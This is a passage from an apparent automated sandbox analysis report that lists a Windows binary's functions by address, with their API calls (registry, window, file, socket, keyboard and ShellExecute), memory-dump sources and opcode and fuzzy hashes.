                                                                                                                                                  • Opcode ID: 352db65505ace6c111b1835386916cd135371caca43778b2cb266db6f0667331
                                                                                                                                                  • Instruction ID: 325144f674fdaed58accb5c37fb81c7fe9368c2c9ee7db250db6b7b268a83873
                                                                                                                                                  • Opcode Fuzzy Hash: 352db65505ace6c111b1835386916cd135371caca43778b2cb266db6f0667331
                                                                                                                                                  • Instruction Fuzzy Hash: 10B1AA31A00225EFDF14DF69C9C57AD7BB1FF04701F188169EC5AAE295D731AA90CBA0
                                                                                                                                                  Function 00C40371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                    • Part of subcall function 00C4147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C4040D,?,?), ref: 00C41491
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C4044E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3479070676-0
                                                                                                                                                  • Opcode ID: a545b3ee51fbe59fcd7478827fdd55ce9e21cf7229c11aed52e817db9372ee68
                                                                                                                                                  • Instruction ID: 998d2705eddd56b0fba3a510152a64c8bff61f67435aa4a2490f58dc0a8e6268
                                                                                                                                                  • Opcode Fuzzy Hash: a545b3ee51fbe59fcd7478827fdd55ce9e21cf7229c11aed52e817db9372ee68
                                                                                                                                                  • Instruction Fuzzy Hash: 29A14870204201AFCB10EF64C891F6EB7F5BF84314F24895DF9969B2A2DB31EA45DB46
                                                                                                                                                  Function 00BC2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BFC508,00000004,00000000,00000000,00000000), ref: 00BC2E9F
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00BFC508,00000004,00000000,00000000,00000000,000000FF), ref: 00BC2EE7
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00BFC508,00000004,00000000,00000000,00000000), ref: 00BFC55B
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BFC508,00000004,00000000,00000000,00000000), ref: 00BFC5C7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                                  • Opcode ID: 8ed686dbae5e9e672c08ebb6c79100cf5c2df43ca694dc816f49347181e89acd
                                                                                                                                                  • Instruction ID: 7d2bb90dd409effd3b126c96fc4ccb90796d66a47c974d7f1c1bd46d4499a69c
                                                                                                                                                  • Opcode Fuzzy Hash: 8ed686dbae5e9e672c08ebb6c79100cf5c2df43ca694dc816f49347181e89acd
                                                                                                                                                  • Instruction Fuzzy Hash: A141073460478A9AC7359B29C9C9F7A7FD2EB95300F2444CDE947A36A1C771E8C4D714
                                                                                                                                                  Function 00C27681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C27698
                                                                                                                                                    • Part of subcall function 00BE0FE6: std::exception::exception.LIBCMT ref: 00BE101C
                                                                                                                                                    • Part of subcall function 00BE0FE6: __CxxThrowException@8.LIBCMT ref: 00BE1031
                                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C276CF
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00C276EB
                                                                                                                                                  • _memmove.LIBCMT ref: 00C27739
                                                                                                                                                  • _memmove.LIBCMT ref: 00C27756
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00C27765
                                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C2777A
                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C27799
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 256516436-0
                                                                                                                                                  • Opcode ID: fd1d58240cc8d9a3e46d49236035bec42501bbea6da63fa30a8ea0a3926b2aae
                                                                                                                                                  • Instruction ID: d4c7e65070594c7cb5dbbff7fa2d3c8dc0fa110daa103b07fd9d1db946b516b3
                                                                                                                                                  • Opcode Fuzzy Hash: fd1d58240cc8d9a3e46d49236035bec42501bbea6da63fa30a8ea0a3926b2aae
                                                                                                                                                  • Instruction Fuzzy Hash: D131AF36904209EBCB10EF65DC85E6EB7B8EF45710F2441A5F904EB256DB70DE90DBA0
                                                                                                                                                  Function 00C467F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DeleteObject.GDI32(00000000,00000001,?,?,?,?,00C4964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00C46810
                                                                                                                                                  • GetDC.USER32(00000000,00000001,?,?,?,?,00C4964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00C46818
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A,?,?,00C4964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00C46823
                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000,?,?,00C4964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00C4682F
                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C4686B
                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001,?,?,00C4964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00C4687C
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C4964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00C468B6
                                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000,?,?,00C4964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00C468D6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                                  • Opcode ID: ad15be3b17e67562712aea0401aaae236fc765f7e69c493582e4f7d3ec49e146
                                                                                                                                                  • Instruction ID: e8f15f2edd709b52168d4d846e3ef349b10645cd0d6700daf13bc5a46c312872
                                                                                                                                                  • Opcode Fuzzy Hash: ad15be3b17e67562712aea0401aaae236fc765f7e69c493582e4f7d3ec49e146
                                                                                                                                                  • Instruction Fuzzy Hash: 62314B761012146FEB118F10CC4AFEA3BA9FF4A761F044055FE08EA292D6759991CB61
                                                                                                                                                  Function 00C1C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memcmp
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2931989736-0
                                                                                                                                                  • Opcode ID: 490a7ca77c205fd67b59c744702c77153191b951d97d1998b950f91028e17758
                                                                                                                                                  • Instruction ID: c0bcd2e2ef67cd89cbdbba5c54a13abc21565c7890f4a14482d2a9b9e5016838
                                                                                                                                                  • Opcode Fuzzy Hash: 490a7ca77c205fd67b59c744702c77153191b951d97d1998b950f91028e17758
                                                                                                                                                  • Instruction Fuzzy Hash: 132107767802557BE20075168DC2FEB33AC9E22780B148120FD12A62C2E7A0EF95E6E5
                                                                                                                                                  Function 00C2F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC4D37: __itow.LIBCMT ref: 00BC4D62
                                                                                                                                                    • Part of subcall function 00BC4D37: __swprintf.LIBCMT ref: 00BC4DAC
                                                                                                                                                    • Part of subcall function 00BD436A: _wcscpy.LIBCMT ref: 00BD438D
                                                                                                                                                  • _wcstok.LIBCMT ref: 00C2F2D7
                                                                                                                                                  • _wcscpy.LIBCMT ref: 00C2F366
                                                                                                                                                  • _memset.LIBCMT ref: 00C2F399
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                  • String ID: X
                                                                                                                                                  • API String ID: 774024439-3081909835
                                                                                                                                                  • Opcode ID: 420cfc63b4e4016533db135210bd6c9cd064583502a966e7a1853b89eca27491
                                                                                                                                                  • Instruction ID: 3e566221256492796feb98dbe00a1ad3cdeae6ad3bd4a201390c2b574bbcbfba
                                                                                                                                                  • Opcode Fuzzy Hash: 420cfc63b4e4016533db135210bd6c9cd064583502a966e7a1853b89eca27491
                                                                                                                                                  • Instruction Fuzzy Hash: 5CC19A715043559FC724EF68D891A5EB7F4AF84310F10897DF8998B2A2EB30ED46CB82
                                                                                                                                                  Function 00C371EE Relevance: 10.8, APIs: 7, Instructions: 250COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #151.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C372EB
                                                                                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C3730C
                                                                                                                                                  • #111.WSOCK32(00000000), ref: 00C3731F
                                                                                                                                                  • #15.WSOCK32(?,?,?,00000000,?), ref: 00C373D5
                                                                                                                                                  • #11.WSOCK32(?), ref: 00C37392
                                                                                                                                                    • Part of subcall function 00C1B4EA: _strlen.LIBCMT ref: 00C1B4F4
                                                                                                                                                    • Part of subcall function 00C1B4EA: _memmove.LIBCMT ref: 00C1B516
                                                                                                                                                  • _strlen.LIBCMT ref: 00C3742F
                                                                                                                                                  • _memmove.LIBCMT ref: 00C37498
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove_strlen$#111#151
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2620998920-0
                                                                                                                                                  • Opcode ID: 70b041eb83089208552b1c1255b4c5bd0598cb9459395131de2aecdd376c5e30
                                                                                                                                                  • Instruction ID: b72d314e118e7084506d86b9b189ed3ceed839d492edf105e6f57735fedf0a41
                                                                                                                                                  • Opcode Fuzzy Hash: 70b041eb83089208552b1c1255b4c5bd0598cb9459395131de2aecdd376c5e30
                                                                                                                                                  • Instruction Fuzzy Hash: B181C1B1118300ABC320EB24DC92F6BB7E8EF84714F148A5DF5559B292EB71EE41CB91
                                                                                                                                                  Function 00BC1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1cf57778a501d25d66759708b83f163f1f42db0f02bf79601087b8a619887e06
                                                                                                                                                  • Instruction ID: e3f90c83ca069b72f62d302de45357dac21de1cb54cda3e41d5d7dd8d48564c6
                                                                                                                                                  • Opcode Fuzzy Hash: 1cf57778a501d25d66759708b83f163f1f42db0f02bf79601087b8a619887e06
                                                                                                                                                  • Instruction Fuzzy Hash: FC715B74904109EFDB058F58CC88FBEBBB9FF86311F248599E915BB252C7309A51CBA0
                                                                                                                                                  Function 00C4B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindow.USER32(016F4BF0), ref: 00C4BA5D
                                                                                                                                                  • IsWindowEnabled.USER32(016F4BF0), ref: 00C4BA69
                                                                                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000,?,?,?,?,?,00000000), ref: 00C4BB4D
                                                                                                                                                  • SendMessageW.USER32(016F4BF0,000000B0,?,?), ref: 00C4BB84
                                                                                                                                                  • IsDlgButtonChecked.USER32(?,?,?,?), ref: 00C4BBC1
                                                                                                                                                  • GetWindowLongW.USER32(016F4BF0,000000EC,?,?,016F4BF0), ref: 00C4BBE3
                                                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C4BBFB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4072528602-0
                                                                                                                                                  • Opcode ID: 1d186fbd41a9829a017590d01859d2597dd38f9cae264e21b318739aa15a8cb4
                                                                                                                                                  • Instruction ID: a84c28fa864d3e4879ef04042d66e2cde50f6e90d2185f0e61207a1d619a036a
                                                                                                                                                  • Opcode Fuzzy Hash: 1d186fbd41a9829a017590d01859d2597dd38f9cae264e21b318739aa15a8cb4
                                                                                                                                                  • Instruction Fuzzy Hash: 6571CD34A04204AFDB259F54C8D4FBABBB9FF09310F204059F965A72A1CB31EE50EB60
                                                                                                                                                  Function 00C3FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C3FB31
                                                                                                                                                  • _memset.LIBCMT ref: 00C3FBFA
                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00C3FC3F
                                                                                                                                                    • Part of subcall function 00BC4D37: __itow.LIBCMT ref: 00BC4D62
                                                                                                                                                    • Part of subcall function 00BC4D37: __swprintf.LIBCMT ref: 00BC4DAC
                                                                                                                                                    • Part of subcall function 00BD436A: _wcscpy.LIBCMT ref: 00BD438D
                                                                                                                                                  • GetProcessId.KERNEL32(00000000), ref: 00C3FCB6
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00C3FCE5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 3522835683-2766056989
                                                                                                                                                  • Opcode ID: e854d39a7d614306daad9bca96c5dcaf954a80c723c8f52d3b0a2bdef8166572
                                                                                                                                                  • Instruction ID: a6abbe1a812aad29011babfbad80ce71f258ef6fd84c98d6fb8d3f67c677cb4c
                                                                                                                                                  • Opcode Fuzzy Hash: e854d39a7d614306daad9bca96c5dcaf954a80c723c8f52d3b0a2bdef8166572
                                                                                                                                                  • Instruction Fuzzy Hash: 51618D75A006199FCB14EF54C495AAEF7F5FF48314F1488ADE856AB351CB30AE42CB90
                                                                                                                                                  Function 00C2174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetParent.USER32(?,?,?,00000011), ref: 00C2178B
                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00C217A0
                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00C21801
                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C2182F
                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C2184E
                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C21894
                                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C218B7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                  • Opcode ID: bf3c9afc4ed7ae55f8c101c9f5132f1d1ee40fb363575e924e890297f7dfc627
                                                                                                                                                  • Instruction ID: f1024e7fec76dc362b37bfb4ff0737b68beb8e3886efd8a29bc89ab22b4a64e8
                                                                                                                                                  • Opcode Fuzzy Hash: bf3c9afc4ed7ae55f8c101c9f5132f1d1ee40fb363575e924e890297f7dfc627
                                                                                                                                                  • Instruction Fuzzy Hash: F85106A0A087E53EFB368638DC45BBA7EE95B16700F0C8589E8E555CC3C298DEC4E750
                                                                                                                                                  Function 00C21565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetParent.USER32(00000000,00000000,00000000), ref: 00C215A4
                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00C215B9
                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00C2161A
                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C21646
                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C21663
                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C216A7
                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C216C8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                  • Opcode ID: 4a114afa41337f93d192c25ea6cdd3cd047cf9c8c8e28c5dfe5ff70273d3d489
                                                                                                                                                  • Instruction ID: 3706866ca480adfdb1d5c5e7587ac9647395ba6bcd9ee98ec40e71dd79403bbd
                                                                                                                                                  • Opcode Fuzzy Hash: 4a114afa41337f93d192c25ea6cdd3cd047cf9c8c8e28c5dfe5ff70273d3d489
                                                                                                                                                  • Instruction Fuzzy Hash: EB5115A05047E53DFB3287249C05BBA7EE9AB56700F0C8489F8E546CC2C694EE88E790
                                                                                                                                                  Function 00C25BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
